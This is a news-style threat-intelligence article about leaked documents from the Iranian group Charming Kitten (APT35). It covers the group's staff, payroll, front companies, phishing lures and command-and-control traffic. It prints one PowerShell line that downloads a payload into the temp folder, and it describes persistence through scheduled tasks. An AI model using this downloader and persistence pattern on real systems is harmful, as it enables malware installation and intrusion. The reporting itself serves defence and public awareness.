Recent leaks originating from the Iranian state-sponsored hacking group “Charming Kitten,” also identified as APT35, have exposed critical personnel, front companies, and thousands of compromised digital systems across five continents. These revelations provide an unprecedented, granular view into the operations of Iran’s Department 40 within the IRGC Intelligence Organization, detailing how they conduct sustained cyber-espionage, surveillance, and targeting campaigns.
Internal documents, including stolen dashboards and payroll records, now directly link named operators to specific cyber-attacks, moving beyond anonymous threat actor labels. The leaked financial data further elucidates the underlying economic structure supporting these operations. This includes salary slips attributed to internal teams, such as the ‘Sisters Team’ and ‘Brothers Team,’ and evidence of funds being routed through shell companies that masquerade as legitimate IT and cloud service providers. The scale of compromised systems is extensive, encompassing VPN gateways, email servers, and command-and-control infrastructure utilized to manage malware deployed within government agencies, academic institutions, and telecommunications providers worldwide.
Charming Kitten Leak Details Operational Structure
The leaked materials offer a comprehensive picture of the convergence of financial resources, management directives, and malware deployment within a single, coordinated system. Security researcher Nariman Gharib, who analyzed the data, noted that the collection also includes tasking sheets and target lists. These documents explicitly connect Charming Kitten’s malware activities to specific networks operating in the diplomatic, energy, and civil society sectors.
Typically, infections are initiated through sophisticated spear-phishing emails, deceptive login pages, or malicious document attachments. These lures often impersonate legitimate communications such as meeting invitations, pay stubs, or official policy documents. Once a target opens the lure and is prompted to enable scripts or provide credentials, the operators gain an initial foothold, which can then escalate to full system control and subsequent data exfiltration.
Analysis of the leaked dashboard logs reveals consistent communication patterns from victim hosts back to Iranian-controlled servers. This communication, often disguised as routine web traffic via HTTPS, occurs at regular intervals. The compromised systems implicated in these patterns include critical infrastructure such as email gateways, domain controllers, and individual user laptops, granting operators access to sensitive email communications, shared files, and identity management systems. The report highlights distinct clusters of infected machines, categorized by geographical region and industrial sector, underscoring the broad reach of these cyber operations.
Infection Mechanism and Command and Control
The initial stages of infection commonly involve a small loader program that executes in memory. This loader is typically activated after a user interacts with a macro-enabled document or an HTML lure. Subsequent commands, often leveraging PowerShell, fetch the primary malware payload from a fixed but concealed URL. This technical breakdown of Charming Kitten’s tools and methods has been thoroughly documented.
Invoke-WebRequest $u -OutFile "$env:TEMP\svc.exe"Examination of the leaked operational logs indicates that this downloaded binary is frequently installed as a scheduled task. This configuration ensures persistent access to the compromised system while allowing its activities to blend with standard Windows operational processes, making detection more challenging.
The implications of this leak are significant for global cybersecurity. The detailed exposure of Charming Kitten’s operational methods, personnel, and financial backing provides intelligence agencies and cybersecurity firms with actionable insights to bolster defenses against state-sponsored threats. The evidence of financial structures and named operators suggests a systematic and well-resourced cyber warfare capability emanating from Iran. As this information becomes more widely analyzed, the international community anticipates potential diplomatic responses and further cybersecurity strengthening measures.